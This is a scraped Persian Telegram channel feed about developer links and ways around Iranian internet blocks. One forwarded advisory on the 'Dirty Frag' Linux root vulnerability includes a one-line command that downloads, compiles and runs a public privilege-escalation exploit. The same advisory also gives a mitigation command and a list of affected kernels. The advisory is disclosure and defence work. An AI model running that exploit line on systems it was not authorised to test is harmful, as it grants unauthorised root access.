The Commit
418 subscribers
273 photos
74 videos
10 files
227 links
توسعه میدیم و توی راه توسعه چالش ها و مشکلات رو به اشتراک میزاریم (:

@TheLinuxGP
Download Telegram
و الان که دسترسی گیت هاب بازه میتونید هم سینماپلاس رو کلون کنید هم DNS Checker که امیدوارم یه کمکی بهتون کرده باشه ( البته اون dns رو تکمیل نکردم )
CinemaPlus:
github.com/MamdMehrabi/CinemaPlus

DNS Checker:
github.com/MamdMehrabi/DNS-Checker
👍2
فک کن بخاطر اینکه پارتی نداری نمیتونی سرور ایران ایپی وایت بخری و به اینترنتی که حق عادیت هست برسی خیلی فشار داره
💔5
تلگرام آپدیت داده اقاااااااا 🫪
بدو بریم پمپ بنزین
🤣1
🔹یوتیوب دانلودر(با نت ملی)
یک نفر اومده یه حرکت باحال زده با اکشنز گیتهاب اومده یوتیوب دانلودر ساخته
اینم لینک ریپازیتوری خودتون راهنماش بخونید

https://github.com/alitavakoli01/YouTubeDownloader

----
@PythonFarsi2024
Forwarded from gooyban🦆
بازهم آسیب‌پذیری تمام لینوکس‌ها از ۲۰۱۷: Dirty Frag

آسیب‌پذیری تازه‌ای در ادامه‌ی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیع‌ها می‌تونه دسترسی root بگیره.

می‌تونید روی سیستم خودتون هم امتحانش کنید:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
echo 3 > /proc/sys/vm/drop_caches

یا ری‌استارت کردن سیستم به حالت پیش برگردونیدش.

راهکار:
تا پچ امنیتی برای توزیعتون بیاد می‌تونید با این دستور ماژولهایی که این آسیب‌پذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"


روی این سیستم‌ها تا الان تست شده و آسیب‌پذیر بودند:
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64


اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
ایده شروع این تحقیق از آسیب‌پذیری Copy Fail گرفته شده. به‌طور مشخص، بخش xfrm-ESP در زنجیره آسیب‌پذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده می‌کند. اما تفاوت مهم این است که این آسیب‌پذیری مستقل از وجود ماژول algif_aead فعال می‌شود.

به عبارت دیگر، حتی اگر روی سیستم راهکار شناخته‌شده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیب‌پذیر باقی می‌ماند.


⌨️ توضیحات بیشتر در گیت‌هاب

تمام این اتفاق‌ها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستم‌ها به روز نشدند، با خبر شدن از این باگ‌ها و برطرف کردنشون به مراتب سخت‌تر خواهد بود.

✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.


🎮 @gooyban
Please open Telegram to view this post
VIEW IN TELEGRAM
از متد mhr استفاده کنید حتما، روی وب اکثر سایتا رو میتونید لود کنید خودم با تلگرام وب پیام میزارم الان و سرعتش هم خوبه
مخزن گیت هابش کامل توضیح داده چیکار کنید:
https://github.com/denuitt1/mhr-cfw
The Commit
از متد mhr استفاده کنید حتما، روی وب اکثر سایتا رو میتونید لود کنید خودم با تلگرام وب پیام میزارم الان و سرعتش هم خوبه مخزن گیت هابش کامل توضیح داده چیکار کنید: https://github.com/denuitt1/mhr-cfw
این روش روی اینترنتی جوابه که گوگل رو پینگ بده مثل ایرانسل یا بعضا همراه اول!
من روی مخابرات چون گوگل بهم پینگ نمیده میام یه DNS شکن ست میکنم که گوگل بهم پینگ بده بعدش هم این متد رو میزنم که بتونم با مخابرات که ترافیکم بیشتره یوتیوب ببینم، سرعتش هم برای یوتیوب واقعا مناسبه*
گیت هاب از دسترس خارج شد.
😢31
یکی از بچه ها چند روز پیش اومد متدشو و اشتباه کرد و پابلیکش کرد تا در کسری از ثانیه دوستان کپی بگیرن و پابلیک کنن و به اسم خودشون بزنن😂

حالا این مخزن اصلی رو میتونید اینجا ببینید که از طریق تماس تصویری بله کار میکنه ( اگر گیت هابتون میاد )

github.com/theermia/BaleTunnel
اقا متد sni اسپوفینگ بازه بزنید سرعتش عالیه دردسر هم نداره خودم وصلم بهش
👍4👎1
The Commit
اقا متد sni اسپوفینگ بازه بزنید سرعتش عالیه دردسر هم نداره خودم وصلم بهش
الان جادی میاد روی چنلی که ویو میخوره اموزش اسپوفینگ رو میزاره
🤣4
The Commit
الان جادی میاد روی چنلی که ویو میخوره اموزش اسپوفینگ رو میزاره
البته که این اسپوف رو حدس میزنم زود ببندن ولی تا الان سرعت خیلی خوبی داره
2
The Commit
اقا متد sni اسپوفینگ بازه بزنید سرعتش عالیه دردسر هم نداره خودم وصلم بهش
هنوز بازه😂😂
یدونه سیستم نیاز دارید که فایل .exe رو ران کنید با اینترنت ایرانسل یا مخابرات ( همراه اول جواب نیس ) از طریق مودم یا موبایل هم میتونین لن بزنید هر دیوایسی که میخواید رو وصل کنید.
🌚1
The Commit
اقا متد sni اسپوفینگ بازه بزنید سرعتش عالیه دردسر هم نداره خودم وصلم بهش
اینو بستن ولی با mhr میتونین بیاین، من هنوز تو خماری اسپوفینگ موندم متاسفانه
اینکه یه کانال میلیونی میاد در مورد متد هایی که مردم وصلن میزاره جنبه کمک کردن نداره بیشتر تلاشش روی اینه متد رو زودتر ببندن تا فروش خودش بیشتر بشه...
👍3
The Commit
اقا sni زنده شده بزنید اینم واس کاستوم sni و endpoint: www.hcaptcha.com 104.19.229.21
اگر این endpoint ها اوکی نبودن اینارو هم تست کنید:
46.38.137.156
85.9.112.219
1
خوشحالم همه داریم وصل میشیم، یه روحی گرفت اصن
3👍1
NetBlocks
Welcome back #Iran!
و بالاخرههههههه
🤣3